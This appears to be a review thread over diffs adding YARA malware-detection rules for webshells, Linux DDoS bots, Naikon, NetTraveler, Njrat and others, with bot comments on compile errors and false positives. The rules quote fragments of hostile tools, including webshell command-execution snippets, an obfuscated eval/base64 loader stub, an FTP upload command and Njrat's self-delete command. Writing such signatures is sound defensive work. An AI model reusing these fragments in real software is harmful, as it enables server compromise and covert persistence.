+		hash = "7e4deb9884ffffa5d82c22f8dc533a45"
+	strings:
+		$s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
+		$s1 = "#Acesso a Shel - 1 ON 0 OFF"
+	condition:
+		1 of them
+}
+rule php_backdoor_php {
+	meta:
+		description = "Semi-Auto-generated  - file php-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+	strings:
+		$s0 = "http://michaeldaw.org   2006"
+		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
+		$s3 = "coded by z0mbie"
+	condition:
+		1 of them
+}
+rule Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php {
+	meta:
+		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+	strings:
+		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
+		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
+		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
+	condition:
+		1 of them
+}
+rule Nshell__1__php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "973fc89694097a41e684b43a21b1b099"
+	strings:
+		$s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
+		$s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
+	condition:
+		1 of them
+}
+rule shankar_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file shankar.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "6eb9db6a3974e511b7951b8f7e7136bb"
+	strings:
+		$sAuthor = "ShAnKaR"
+		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
+		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
+	condition:
+		1 of ($s*) and $sAuthor
+}
+rule Casus15_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Casus15.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
+	strings:
+		$s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
+		$s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
+		$s3 = "value='Calistirmak istediginiz "
+	condition:
+		1 of them
+}
+rule small_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file small.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "fcee6226d09d150bfa5f103bee61fbde"
+	strings:
+		$s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
+		$s4 = "@ini_set('error_log',NULL);" fullword
+	condition:
+		2 of them
+}
+rule shellbot_pl {
+	meta:
+		description = "Semi-Auto-generated  - file shellbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
+	strings:
+		$s0 = "ShellBOT"
+		$s1 = "PacktsGr0up"
+		$s2 = "CoRpOrAtIoN"
+		$s3 = "# Servidor de irc que vai ser usado "
+		$s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
+	condition:
+		2 of them
+}
+rule fuckphpshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "554e50c1265bb0934fcc8247ec3b9052"
+	strings:
+		$s0 = "$succ = \"Warning! "
+		$s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"
+		$s2 = "\\*=-- MEMBERS AREA --=*/"
+		$s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
+	condition:
+		2 of them
+}
+rule ngh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file ngh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c372b725419cdfd3f8a6371cfeebc2fd"
+	strings:
+		$s0 = "Cr4sh_aka_RKL"
+		$s1 = "NGH edition"
+		$s2 = "/* connectback-backdoor on perl"
+		$s3 = "<form action=<?=$script?>?act=bindshell method=POST>"
+		$s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"
+	condition:
+		1 of them
+}
+rule jsp_reverse_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8b0e6779f25a17f0ffb3df14122ba594"
+	strings:
+		$s0 = "// backdoor.jsp"
+		$s1 = "JSP Backdoor Reverse Shell" 
+		$s2 = "http://michaeldaw.org" 
+	condition:
+		1 of them
+}
+rule Tool_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Tool.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
+	strings:
+		$s0 = "mailto:rhfactor@antisocial.com"
+		$s2 = "?raiz=root"
+		$s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"
+		$s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
+	condition:
+		2 of them
+}
+rule NT_Addy_asp {
+	meta:
+		description = "Semi-Auto-generated  - file NT Addy.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2e0d1bae844c9a8e6e351297d77a1fec"
+	strings:
+		$s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
+		$s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
+		$s4 = "RAW D.O.S. COMMAND INTERFACE"
+	condition:
+		1 of them
+}
+rule SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php {
+	meta:
+		description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+	strings:
+		$s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
+		$s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+		$s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
+	condition:
+		1 of them
+}
+rule RemExp_asp {
+	meta:
+		description = "Semi-Auto-generated  - file RemExp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+	strings:
+		$s0 = "<title>Remote Explorer</title>"
+		$s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
+		$s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+	condition:
+		2 of them
+}
+rule phvayvv_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file phvayvv.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "35fb37f3c806718545d97c6559abd262"
+	strings:
+		$s0 = "{mkdir(\"$dizin/$duzenx2\",777)"
+		$s1 = "$baglan=fopen($duzkaydet,'w');"
+		$s2 = "PHVayv 1.0"
+	condition:
+		1 of them
+}
+rule klasvayv_asp {
+	meta:
+		description = "Semi-Auto-generated  - file klasvayv.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2b3e64bf8462fc3d008a3d1012da64ef"
+	strings:
+		$s1 = "set aktifklas=request.querystring(\"aktifklas\")"
+		$s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
+		$s3 = "<font color=\"#858585\">www.aventgrup.net"
+		$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
+	condition:
+		1 of them
+}
+rule r57shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file r57shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d28445de424594a5f14d0fe2a7c4e94f"
+	strings:
+		$s0 = "r57shell" fullword 
+		$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
+		$s2 = "RusH security team"
+		$s3 = "'ru_text12' => 'back-connect"
+	condition:
+		1 of them
+}
+rule rst_sql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file rst_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0961641a4ab2b8cb4d2beca593a92010"
+	strings:
+		$s0 = "C:\\tmp\\dump_"
+		$s1 = "RST MySQL"
+		$s2 = "http://rst.void.ru"
+		$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
+	condition:
+		2 of them
+}
+rule wh_bindshell_py {
+	meta:
+		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "fab20902862736e24aaae275af5e049c"
+	strings:
+		$s0 = "#Use: python wh_bindshell.py [port] [password]"
+		$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
+		$s3 = "#bugz: ctrl+c etc =script stoped=" fullword
+	condition:
+		1 of them
+}
+rule lurm_safemod_on_cgi {
+	meta:
+		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5ea4f901ce1abdf20870c214b3231db3"
+	strings:
+		$s0 = "Network security team :: CGI Shell" fullword
+		$s1 = "#########################<<KONEC>>#####################################" fullword
+		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
+	condition:
+		1 of them
+}
+rule c99madshell_v2_0_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d27292895da9afa5b60b9d3014f39294"
+	strings:
+		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
+	condition:
+		all of them
+}
+rule backupsql_php_often_with_c99shell {
+	meta:
+		description = "Semi-Auto-generated  - file backupsql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
+	strings:
+		$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
+		$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+	condition:
+		all of them
+}
+rule uploader_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file uploader.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0b53b67bb3b004a8681e1458dd1895d0"
+	strings:
+		$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+		$s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
+		$s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
+	condition:
+		2 of them
+}
+rule telnet_pl {
+	meta:
+		description = "Semi-Auto-generated  - file telnet.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "dd9dba14383064e219e29396e242c1ec"
+	strings:
+		$s0 = "W A R N I N G: Private Server"
+		$s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "
+	condition:
+		all of them
+}
+rule w3d_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file w3d.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "987f66b29bfb209a0b4f097f84f57c3b"
+	strings:
+		$s0 = "W3D Shell"
+		$s1 = "By: Warpboy"
+		$s2 = "No Query Executed"
+	condition:
+		2 of them
+}
+
+
+rule rtf_yahoo_ken
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Yahoo Ken"
+	filetype = "RTF"
+	version = "0.1"
+	description = "Test rule"
+	date = "2013-12-14"
+strings:
+	$magic1 = { 7b 5c 72 74 30 31 } // {\rt01
+	$magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
+	$magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
+	$author1 = { 79 61 68 6f 6f 20 6b 65 63 } // "yahoo ken"
+condition:
+	($magic1 or $magic2 or $magic3 at 0) and $author1
+} 
+
+
+rule ZXProxy
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+	
+strings:
+	$C = "\\Control\\zxplug" nocase wide ascii
+	$h = "http://www.facebook.com/comment/update.exe" wide ascii
+	$S = "Shared a shell to %s:%s Successfully" nocase wide ascii
+condition:
+	any of them
+}
+
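Review bot: `ScanBox_Malware_Generic` declares `$s3` twice (`"SecureInput .exe"` and `"SEOUL1"`), which YARA rejects as a duplicated string identifier, so the whole Miscelanea.yar file fails to compile. The second one sits under "Certificate and Keywords" and should be `$x3 = "SEOUL1" fullword ascii`; that also makes the `( 3 of ($x*) )` branch satisfiable, which with only `$x1`/`$x2` it currently never is. Separately, `Embedded_EXE_Cloaking`'s loop body `@a1 < ( @mz[i] + 200 )` has no lower bound, so a DOS-stub string anywhere before MZ+200 satisfies it; `$a1 in (@mz[i]..@mz[i] + 200)` is what the description implies, and `#mz` over a two-byte atom will be slow on large inputs.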
diff --git a/malware/Miscelanea_Linux.yar b/malware/Miscelanea_Linux.yar
new file mode 100644
index 0000000..9dbd86a
--- /dev/null
+++ b/malware/Miscelanea_Linux.yar
@@ -0,0 +1,77 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule LinuxAESDDoS
+{
+    meta:
+	author = "@benkow_"
+        description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+    strings:
+        $a = "3AES"
+        $b = "Hacker"
+        $c = "VERSONEX"
+
+    condition:
+        2 of ($a,$b,$c)
+}
+
+rule LinuxBillGates 
+{
+    meta:
+	author = "@benkow_"
+        description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429"
+
+    strings:
+        $a= "12CUpdateGates"
+        $b= "11CUpdateBill"
+
+    condition:
+        $a and $b
+}
+
+rule LinuxElknot
+{
+    meta:
+	author = "@benkow_"
+        description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099"
+
+    strings:
+        $a = "ZN8CUtility7DeCryptEPciPKci"
+	$b = "ZN13CThreadAttack5StartEP11CCmdMessage"
+
+    condition:
+        $a and $b
+}
+
+rule LinuxMrBlack
+{
+    meta:
+	author = "@benkow_"
+        description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+    strings:
+        $a = "Mr.Black"
+	$b = "VERS0NEX:%s|%d|%d|%s"
+    condition:
+        $a and $b
+}
+
+rule LinuxTsunami
+{
+    meta:
+	author = "@benkow_"
+        description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+    strings:
+        $a = "PRIVMSG %s :[STD]Hitting %s"
+        $b = "NOTICE %s :TSUNAMI <target> <secs>"
+        $c = "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually."
+    condition:
+        $a or $b or $c
+}
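Review bot: In LinuxAESDDoS the condition `2 of ($a,$b,$c)` is satisfied by `$b = "Hacker"` plus any one of the other two tokens, and "Hacker" is a common word in benign text, so the rule's precision rests entirely on `3AES`/`VERSONEX`. Consider requiring one of the distinctive strings explicitly, e.g. `condition: ($a or $c) and 2 of them`. Separately, this file imports the `pe` module although every rule in it targets Linux ELF samples; the import is harmless but hides the fact that nothing here needs it.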
diff --git a/malware/Miscelanea_RTF.yar b/malware/Miscelanea_RTF.yar
new file mode 100644
index 0000000..3f4ae9a
--- /dev/null
+++ b/malware/Miscelanea_RTF.yar
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule rtf_multiple
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Multiple"
+	version = "0.1"
+	reference = "fd69a799e21ccb308531ce6056944842" 
+	date = "01/04/2014"
+strings:
+	$rtf = { 7b 5c 72 74 ?? ?? } // {\rt01 {\rtf1 {\rtxa
+    	$string1  = "author user"
+	$string2   = "title Vjkygdjdtyuj" nocase
+	$string3    = "company ooo"
+	$string4  = "password 00000000"
+condition:
+    ($rtf at 0) and (all of ($string*))
+}
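Review bot: The `reference` field of rtf_multiple holds an MD5 (`fd69a799e21ccb308531ce6056944842`) rather than a URL, and `date = "01/04/2014"` is ambiguous between DD/MM and MM/DD while the rest of this ruleset uses ISO dates; suggest `hash = "fd69a799e21ccb308531ce6056944842"` and `date = "2014-01-04"` (or `"2014-04-01"`, whichever is correct). The `import "pe"` at the top is unused by an RTF rule and could be dropped.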
diff --git a/malware/NSFree.yar b/malware/NSFree.yar
new file mode 100644
index 0000000..2cad299
--- /dev/null
+++ b/malware/NSFree.yar
@@ -0,0 +1,53 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NSFreeCode : NSFree Family 
+{
+    meta:
+        description = "NSFree code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+    
+    strings:
+        // push vars then look for MZ
+        $ = { 53 56 57 66 81 38 4D 5A }
+        // nops then look for PE\0\0
+        $ = { 90 90 90 90 81 3F 50 45 00 00 }
+    
+    condition:
+        all of them
+}
+
+rule NSFreeStrings : NSFree Family
+{
+    meta:
+        description = "NSFree Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+        
+    strings:
+        $ = "\\MicNS\\" nocase
+        $ = "NSFreeDll" wide ascii
+        // xor 0x58 dos stub
+        $ = { 0c 30 31 2b 78 28 2a 37 3f 2a 39 35 78 3b 39 36 36 37 }
+        
+    condition:
+       any of them
+}
+
+rule NSFree : Family
+{
+    meta:
+        description = "NSFree"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+        
+    condition:
+        NSFreeCode or NSFreeStrings
+}
+
+
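Review bot: NSFreeCode's two patterns are generic header-scanning code — `66 81 38 4D 5A` is `cmp word ptr [eax], 'MZ'` and `81 3F 50 45 00 00` is `cmp dword ptr [edi], 'PE\0\0'` — which any hand-written PE parser, packer stub or reflective loader may contain, so `all of them` on two short fragments is a weak family signature, and the aggregate `NSFree` rule promotes a hit on it alone to a family match. If these rules are run on files rather than memory, consider gating the aggregate on the strings or on a PE header, e.g. `NSFreeStrings or (NSFreeCode and uint16(0) == 0x5A4D)`, or at least note the FP risk in the meta. A short comment on why the NOP sled precedes the PE check (presumably an alignment artifact in the sample — confirm) would also help the next maintainer.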
diff --git a/malware/Naikon.yar b/malware/Naikon.yar
new file mode 100644
index 0000000..dd10c3f
--- /dev/null
+++ b/malware/Naikon.yar
@@ -0,0 +1,53 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NaikonCode : Naikon Family 
+{
+    meta:
+        description = "Naikon code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+    
+    strings:
+        // decryption
+        $ = { 0F AF C1 C1 E0 1F } // imul eax, ecx; shl eah, 1fh
+        $ = { 35 5A 01 00 00} // xor eax, 15ah
+        $ = { 81 C2 7F 14 06 00 } // add edx, 6147fh
+    
+    condition:
+        all of them
+}
+
+rule NaikonStrings : Naikon Family
+{
+    meta:
+        description = "Naikon Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "NOKIAN95/WEB"
+        $ = "/tag=info&id=15"
+        $ = "skg(3)=&3.2d_u1"
+        $ = "\\Temp\\iExplorer.exe"
+        $ = "\\Temp\\\"TSG\""
+        
+    condition:
+       any of them
+}
+
+rule Naikon : Family
+{
+    meta:
+        description = "Naikon"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        NaikonCode or NaikonStrings
+}
+
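Review bot: The comment on NaikonCode's first pattern reads `shl eah, 1fh`, but `C1 E0 1F` encodes `shl eax, 1Fh` (there is no `eah` register); change it to `// imul eax, ecx; shl eax, 1Fh`. The other two comments do match their bytes (`35 5A 01 00 00` is `xor eax, 15Ah`, `81 C2 7F 14 06 00` is `add edx, 6147Fh`). NaikonStrings fires on `any of them`, and `"/tag=info&id=15"` is a plausible URL fragment in benign web content; consider `fullword` or pairing it with a second string.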
diff --git a/malware/NetPass.yar b/malware/NetPass.yar
new file mode 100644
index 0000000..103189a
--- /dev/null
+++ b/malware/NetPass.yar
@@ -0,0 +1,39 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NetpassStrings : NetPass Variant {
+
+        meta:
+                description = "Identifiers for netpass variant"
+                author = "Katie Kleemola"
+                last_updated = "2014-05-29"
+
+        strings:
+		$exif1 = "Device Protect ApplicatioN" wide
+		$exif2 = "beep.sys" wide //embedded exe name
+		$exif3 = "BEEP Driver" wide //embedded exe description
+		
+		$string1 = "\x00NetPass Update\x00"
+		$string2 = "\x00%s:DOWNLOAD\x00"
+		$string3 = "\x00%s:UPDATE\x00"
+		$string4 = "\x00%s:uNINSTALL\x00"
+
+        condition:
+                all of ($exif*) or any of ($string*)
+
+}	
+
+rule NetPass : Variant {
+	meta:
+		description = "netpass variant"
+		author = "Katie Kleemola"
+		last_updated = "2014-07-08"
+	condition:
+		NetpassStrings
+}
+
+
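Review bot: `$string4 = "\x00%s:uNINSTALL\x00"` has odd casing (`uNINSTALL`) while its siblings are `DOWNLOAD`/`UPDATE` in full upper case; if that is a transcription slip rather than the literal bytes in the sample, the string can never match, and under `any of ($string*)` nobody would notice. Either confirm against the sample and add `// sic: casing as in binary`, or write `$string4 = "%s:UNINSTALL" nocase`. Note also that `beep.sys` and `BEEP Driver` are strings from a genuine Windows driver, so in the `all of ($exif*)` clause `Device Protect ApplicatioN` is doing all the discriminating work; a comment saying so would help triage.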
diff --git a/malware/NetTraveler.yar b/malware/NetTraveler.yar
new file mode 100644
index 0000000..1a521a9
--- /dev/null
+++ b/malware/NetTraveler.yar
@@ -0,0 +1,63 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NetTravStrings : NetTraveler Family {
+
+
+	meta:
+        	description = "Identifiers for NetTraveler DLL"
+		author = "Katie Kleemola"
+        	last_updated = "2014-05-20"
+
+	strings:
+		//network strings
+		$ = "?action=updated&hostid="
+		$ = "travlerbackinfo"
+		$ = "?action=getcmd&hostid="
+		$ = "%s?action=gotcmd&hostid="
+		$ = "%s?hostid=%s&hostname=%s&hostip=%s&filename=%s&filestart=%u&filetext="
+
+		//debugging strings
+		$ = "\x00Method1 Fail!!!!!\x00"
+		$ = "\x00Method3 Fail!!!!!\x00"
+		$ = "\x00method currect:\x00"
+		$ = /\x00\x00[\w\-]+ is Running!\x00\x00/
+		$ = "\x00OtherTwo\x00"
+
+	condition:
+		any of them
+
+}
+
+rule NetTravExports : NetTraveler Family {
+
+	meta:
+		description = "Export names for dll component"
+		author = "Katie Kleemola"
+		last_updated = "2014-05-20"
+	
+	strings:
+		//dll component exports
+		$ = "?InjectDll@@YAHPAUHWND__@@K@Z"
+		$ = "?UnmapDll@@YAHXZ"
+		$ = "?g_bSubclassed@@3HA"
+		
+	condition:
+		any of them
+}
+
+rule NetTraveler : Family {
+	meta:
+		description = "Nettravelr"
+		author = "Katie Kleemola"
+		last_updated = "2014-07-08"
+	
+	condition:
+		NetTravExports or NetTravStrings or NetpassStrings
+
+}
+
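Review bot: The `NetTraveler` condition references `NetpassStrings`, which is not defined in this file (it lives in NetPass.yar); YARA resolves rule references only against rules compiled earlier in the same compilation, so NetTraveler.yar compiled on its own, or included before NetPass.yar, fails with an undefined identifier. Either drop the cross-file dependency (`condition: NetTravExports or NetTravStrings`) or document at the top of the file that NetPass.yar must be included first. The `description = "Nettravelr"` meta is also misspelled; `"NetTraveler"` matches the rule name.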
diff --git a/malware/Njrat.yar b/malware/Njrat.yar
new file mode 100644
index 0000000..2485ced
--- /dev/null
+++ b/malware/Njrat.yar
@@ -0,0 +1,35 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Njrat
+{
+    meta:
+        description = "Njrat"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $string1 = /(F)romBase64String/
+        $string2 = /(B)ase64String/
+        $string3 = /(C)onnected/ wide ascii
+        $string4 = /(R)eceive/
+        $string5 = /(S)end/ wide ascii
+        $string6 = /(D)ownloadData/ wide ascii
+        $string7 = /(D)eleteSubKey/ wide ascii
+        $string8 = /(g)et_MachineName/
+        $string9 = /(g)et_UserName/
+        $string10 = /(g)et_LastWriteTime/
+        $string11 = /(G)etVolumeInformation/
+        $string12 = /(O)SFullName/ wide ascii
+        $string13 = /(n)etsh firewall/ wide
+        $string14 = /(c)md\.exe \/k ping 0 & del/ wide
+        $string15 = /(c)md\.exe \/c ping 127\.0\.0\.1 & del/ wide
+        $string16 = /(c)md\.exe \/c ping 0 -n 2 & del/ wide
+        $string17 = {7C 00 27 00 7C 00 27 00 7C}
+
+    condition:
+        10 of them
+}
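Review bot: Most of Njrat's 17 strings (`FromBase64String`, `Connected`, `Receive`, `Send`, `DownloadData`, `DeleteSubKey`, `get_MachineName`, `get_UserName`, `get_LastWriteTime`, `GetVolumeInformation`, `OSFullName`) are ordinary .NET API names found in countless legitimate assemblies, so `10 of them` can be met without any of the discriminating artifacts — the `cmd.exe ... ping ... & del` self-delete commands in $string14–16 and the `|'|'|` delimiter in $string17. Suggest `condition: 10 of them and ($string17 or any of ($string14, $string15, $string16))`. The parenthesised first letter in each regex (`/(F)romBase64String/`) is presumably there so the rule file does not match itself (RCS.yar uses explicit `$filter*` strings for the same purpose); a one-line comment saying so would stop a future reader from "simplifying" it.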
diff --git a/malware/Notepad.yar b/malware/Notepad.yar
new file mode 100644
index 0000000..f5144f6
--- /dev/null
+++ b/malware/Notepad.yar
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule TROJAN_Notepad {
+    meta:
+        Author = "RSA_IR"
+        Date     = "4Jun13"
+        File     = "notepad.exe v 1.1"
+        MD5      = "106E63DBDA3A76BEEB53A8BBD8F98927"
+    strings:
+        $s1 = "75BAA77C842BE168B0F66C42C7885997"
+        $s2 = "B523F63566F407F3834BCC54AAA32524"
+    condition:
+        $s1 or $s2
+}
+
+
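Review bot: TROJAN_Notepad is byte-for-byte the same rule as `TROJAN_Notepad_shell_crew` in RAT_Terminator.yar (same two strings, same MD5 meta), so a ruleset that includes both files reports every hit twice; keep one copy (this file is the natural home) and delete the other. The meta also says nothing about what the two 32-hex-character strings are or where they come from, so a reader cannot judge FP risk; add a `description` and `reference`, and consider `fullword` on `$s1`/`$s2` so they do not match inside longer hex runs in hash lists or reports.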
diff --git a/malware/Olyx.yar b/malware/Olyx.yar
new file mode 100644
index 0000000..ba9e5e1
--- /dev/null
+++ b/malware/Olyx.yar
@@ -0,0 +1,46 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule OlyxCode : Olyx Family 
+{
+    meta:
+        description = "Olyx code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $six = { C7 40 04 36 36 36 36 C7 40 08 36 36 36 36 }
+        $slash = { C7 40 04 5C 5C 5C 5C C7 40 08 5C 5C 5C 5C }
+        
+    condition:
+        any of them
+}
+
+rule OlyxStrings : Olyx Family
+{
+    meta:
+        description = "Olyx Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $ = "/Applications/Automator.app/Contents/MacOS/DockLight"
+       
+    condition:
+        any of them
+}
+
